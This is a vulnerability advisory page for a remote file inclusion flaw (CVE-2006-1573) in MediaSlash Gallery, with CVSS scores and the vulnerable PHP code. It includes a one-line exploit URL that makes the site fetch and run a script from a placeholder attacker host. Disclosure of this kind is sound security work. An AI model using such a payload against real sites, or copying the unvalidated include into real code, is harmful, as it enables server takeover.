MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability

2006.03.31

Credit: Moroccan Security Team

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-1573

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

author: [Moroccan Security Team]
Vendor: www.MediaSlash.com
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com
Details:
MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
Code:
27 . $rub = @$_GET["rub"];
...
57 . $page_menu = ''.$rub.'/index.php';
489. <? include($page_menu); ?> //!!!!!!!!
Exploit http://[trajet]/[path]/index.php?rub=http://[attacker]
http://[attacker]/index.php will be included and executed withe
the privileges of the web server
Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.